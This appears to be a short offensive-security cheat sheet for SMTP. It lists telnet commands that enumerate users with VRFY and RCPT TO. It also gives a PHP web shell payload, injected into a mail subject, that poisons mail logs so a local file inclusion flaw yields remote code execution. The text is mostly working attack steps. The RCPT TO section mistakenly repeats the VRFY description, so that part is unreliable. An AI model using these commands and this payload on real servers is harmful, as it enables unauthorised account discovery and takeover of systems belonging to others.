SMTP

Simple Mail Transfer Protocol (SMTP) - Port 25

SMTP

Simple Mail Transfer Protocol (SMTP) - Port 25

User Enumeration

VRFY

Check for existing users on a system using the VRFY command in SMTP.

telnet IP PORT
VRFY root
VRFY user

RCPT TO

Check for existing users on a system using the VRFY command in SMTP.

telnet IP PORT
MAIL FROM: root
RCPT TO: root
RCPT TO: user

SMTP Log Poisoning through LFI to RCE

If SMTP is available and a LFI vulnerability is discovered in a web application, injecting a PHP shell into the mail logs via SMTP can lead to RCE through the LFI.

<?php echo system($_GET["cmd"]); ?>

Connect to SMTP and send a message with PHP injected.

telnet IP PORT
HELO x
MAIL FROM: [email protected]
RCPT TO: root
DATA
SUBJECT: <?php echo system($_GET["cmd"]); ?>
.

Browse to the LFI (typically /var/log/mail) to check for code execution.

Resources